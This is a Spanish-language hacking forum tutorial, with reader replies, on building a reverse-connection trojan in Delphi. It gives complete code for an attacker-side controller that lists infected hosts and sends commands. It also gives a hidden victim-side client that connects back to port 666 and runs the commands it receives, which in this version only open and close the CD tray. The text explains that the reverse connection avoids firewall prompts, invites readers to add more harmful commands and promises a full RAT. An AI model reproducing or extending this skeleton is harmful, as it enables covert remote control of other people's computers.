[Titulo] : Creacion de un Troyano de Conexion Inversa
[Lenguaje] : Delphi
[Autor] : Doddy Hackman

[Temario]

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0x01 : Introduccion
0x02 : Creacion del servidor
0x03 : Creacion del cliente
0x04 : Probando el programa

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0x01 : Introduccion

Hola voy a empezar este corto manual sobre como hacer un troyano de conexion inversa en delphi 2010 , un troyano teoricamente es un software malicioso que sirve para entrar en la computadora de la persona a la que quieren infectar.

En este caso vamos a hacer uno de conexion inversa , tradicionalmente se hacian troyanos de conexion directa donde el infectado se convertia en servidor abriendo un puerto para que el atacante puediera entrar simplemente con una conexion por sockets , pero la onda de ahora es la conexion inversa donde el atacante se convierte en el pobre servidor para que las victimas se conecten a nosotros , lo bueno de la conexion inversa es que a la maquina infectada no le va a saltar el firewall cosa que siempre pasa cuando el infectado recibe el amable cartelito de que si quiere desbloquear un misterioso puerto xDD.

Para esto vamos a necesitar usar los componentes ServerSocket y ClientSocket que tiene delphi.

Para instarlo tenemos que ir a Menu -> components -> install packages

En el menu que les aparece busquen el directorio Archivos de programa -> Embarcadero -> Rad Studio -> 7.0 -> bin -> dclsockets70.bpl

Y listo una vez cargado el archivo bpl les va aparecer en la paleta de internet los componentes ServerSocket y ClientSocket.

Antes de comenzar debemos entender que el servidor seremos nosotros osea el atacante y el cliente la victima , no se vayan a confundir y pensarlo al reves xDD.

0x02 : Creacion del servidor

Primero vamos a crear el servidor , para eso vamos a File->New->VCL Forms Application como lo hice en la imagen :

Imagen


Para hacer el formulario decente tenemos que agregar lo siguiente.

[+] 1 ListBox
[+] 2 botones
[+] 1 Edit
[+] 1 ServerSocket (lo ponemos en true para que este activo )

Tiene que quedar como esta imagen.

Imagen


Una vez hecho elegimos cualquiera de los dos botones con el fin de usarlo para refrescar el listbox con las conexiones activas , entonces hacemos doble click en el boton que elegimos como "Refresh" y ponemos el siguiente codigo.

Código: Seleccionar todo

procedure TForm1.Button1Click(Sender: TObject);
var
  lugar: integer; // Declaramos la variable lugar como entero
begin

  ListBox1.Clear; // Limpiamos el contenido de ListBox

  for lugar := 0 To ServerSocket1.Socket.ActiveConnections - 1 do
  // Listamos las conexiones que
  // hay en el server
  begin
    ListBox1.Items.add(ServerSocket1.Socket.Connections[lugar].RemoteHost);
    // Agregamos al ListBox
    // el host del infectado
    // conectado
  end;

end;
Tiene que quedar como en la siguiente imagen.

Imagen


Entonces pasamos al siguiente boton que lo vamos usar para mandar los comandos al pc infectado , entonces hacemos doble click en el segundo boton y pegamos el siguiente codigo comentado.

Código: Seleccionar todo

procedure TForm1.Button2Click(Sender: TObject);

begin

  ServerSocket1.Socket.Connections[ListBox1.Itemindex].SendText(Edit1.Text);
  // Mandamos el comando
  // al pc infectado que
  // seleccionamos en el
  // ListBox

end;
Una imagen de como deberia quedar el codigo.

Imagen



0x03 : Creacion del cliente

Ahora pasamos al cliente.

Lo unico que debemos agregar es el componente ClientSocket al formulario.

Entonces vamos al evento OnCreate del formulario central y pegamos el siguiente codigo.

Código: Seleccionar todo

procedure TForm1.FormCreate(Sender: TObject);
begin

  ClientSocket1.Host := '127.0.0.1'; // Establecemos el host con valor de nuestro ip local
  ClientSocket1.Port := 666; // Establecemos el puerto que sera 666
  ClientSocket1.Open; // Iniciamos la conexion con el servidor

  Application.ShowMainForm := False; // Ocultamos el formulario para que no se vea la ventana

end;
Despues de esto vamos al evento OnRead del componente ClientSocket y copiamos el siguiente codigo comentado.

Código: Seleccionar todo

procedure TForm1.ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket);
var
  code: string;
begin

  // Tenemos que agregar 'uses MMSystem' al inicio del codigo para poder abrir y cerrar la lectora

  code := Socket.ReceiveText; // Capturamos el contenido del socket en la variable code

  if (Pos('opencd', code) > 0) then // Si encontramos opencd en el codigo ...
  begin
    mciSendString('Set cdaudio door open wait', nil, 0, handle);
    // Usamos mciSendString para abrir
    // la lectora
  end;

  if (Pos('closecd', code) > 0) then // Si encontramos closecd en la variable code ...
  begin
    mciSendString('Set cdaudio door closed wait', nil, 0, handle);
    // Cerramos la lectora usando
    // mciSendString
  end;

end;
Una imagen de como deberia quedar el codigo.

Imagen


0x04 : Probando el programa

El codigo resulto mas sencillo de lo que esperaba ya que gracias a los eventos lo hice a todo en 5 minutos , entonces vamos y cargamos los ejecutables primero el servidor y despues el cliente.
Entonces si hicieron todo bien veran que se cargo en el listbox el servidor de una victima que en este caso seria localhost , entonces seleccionamos localhost del listbox y le hacemos click , entonces vamos a usar los dos comandos disponibles que son "opencd" y "closecd".
Los comandos disponibles solo sirven para abrir y cerrar la lectora pero se pueden hacer muchas cosas solo es cuestion de imaginacion , una idea graciosa seria cargar el word y que le escriba solo , de hecho ya hice eso en mi DH Botnet que esta hecha en Perl y PHP.

Les muestro una imagen de como seria todo.

Imagen


Ya llegamos al final de este corto manual pero les aviso que pronto se viene mi primer troyano de conexion inversa en Delphi.

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The End ?
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[Enlace externo eliminado para invitados].
no me extraña que vayas a sacar tu primer rat, e visto que trabajas varios lenguajes y no solo de scripting, la verdad eres de los pocos programadores que hay, de hecho algunas cosas de ruby las aprendi leyendo y comprendiendo codes tuyos, un saludo
Abolición para el torneo del toro de la vega. Death to the murderers of bulls.
Gracias Doddy esperare el proximo tuto
[code2=masm]"For the honor of a king. And the destiny of a country. All for one."[/code2]
Está bien, sólo aclarar a los que no conocen mucho el tema que todos los rats de conexión inversa usan los nombres cambiados, es decir server = cliente y cliente = server; solo para diferenciar qué debemos ejecutar en pc's remotos, supongo que el nombre se mantiene por la 'costumbre' de los rats de conexión directa, que es el mismo código pero sin renombrar cliente y server.

Un saludo.
UDTools.net
GitHub: https://github.com/MetalUDT
cuando termines el troyano completo publicalo me da curiosidad ver como programan los demas, no se que paso con el troyano de josera no publico mas su alusinus
saludos
paresco malo ,pero soy bueno
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